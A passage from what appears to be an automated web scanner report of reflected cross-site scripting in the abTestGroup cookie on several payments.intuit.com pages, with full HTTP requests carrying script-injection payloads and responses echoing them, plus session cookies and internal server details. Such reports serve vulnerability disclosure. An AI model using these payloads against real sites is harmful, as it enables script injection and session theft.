Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1683731"><script>alert(1)</script>8d0a1b75f18;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:16 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=CUtOQX98VPCW+SKAA2O34A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:17 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95DF3390A0805192AA117E3EF2B1833
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109447


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T1683731"><script>alert(1)</script>8d0a1b75f18" type="hidden" />
...[SNIP]...

1.90. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d7ba9<script>alert(1)</script>df514fb9a00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d7ba9<script>alert(1)</script>df514fb9a00;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:00 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=l6UJNFXwWEDsLIgDbSXdhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:01 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F89450A0805192AA117E396BE25DA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109433


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16d7ba9<script>alert(1)</script>df514fb9a00<br />
...[SNIP]...

1.91. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe97"><script>alert(1)</script>b605d5bc92b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bfe97"><script>alert(1)</script>b605d5bc92b;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-wYBl8vzIr2xsu7UV+rclQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9601C8F0A0805192AA117E375BEDB29
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145475


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16bfe97"><script>alert(1)</script>b605d5bc92b" type="hidden" />
...[SNIP]...

1.92. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e3cdf<script>alert(1)</script>457e3b04e25 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3cdf<script>alert(1)</script>457e3b04e25;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=HXfFyAOh1s4XIQ1r8jFuSw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614F610A0805192AA117E3C413B840
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145461


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16e3cdf<script>alert(1)</script>457e3b04e25<br />
...[SNIP]...

1.93. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 94dbf<script>alert(1)</script>468c7862810 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1694dbf<script>alert(1)</script>468c7862810;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pPmRhbq2vNWdPqB79vHiqw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F3CC20A0805192AA117E3B7B31296
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116390


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T1694dbf<script>alert(1)</script>468c7862810<br />
...[SNIP]...

1.94. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32b2"><script>alert(1)</script>eca551a06e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a32b2"><script>alert(1)</script>eca551a06e2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:49 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tkQDatAtu3SKEK4O6mqLXQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:50 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D89780A0805192AA117E36458950A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116404


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16a32b2"><script>alert(1)</script>eca551a06e2" type="hidden" />
...[SNIP]...

1.95. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40f2"><script>alert(1)</script>2ecf5ecc899 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e40f2"><script>alert(1)</script>2ecf5ecc899;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Pbm4EsFX7ItyQ6uhSFsQPg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F07690A0805192AA117E39E651AF3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116192


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16e40f2"><script>alert(1)</script>2ecf5ecc899" type="hidden" />
...[SNIP]...

1.96. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ff5ed<script>alert(1)</script>1c8e4d0787a was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ff5ed<script>alert(1)</script>1c8e4d0787a;

Response

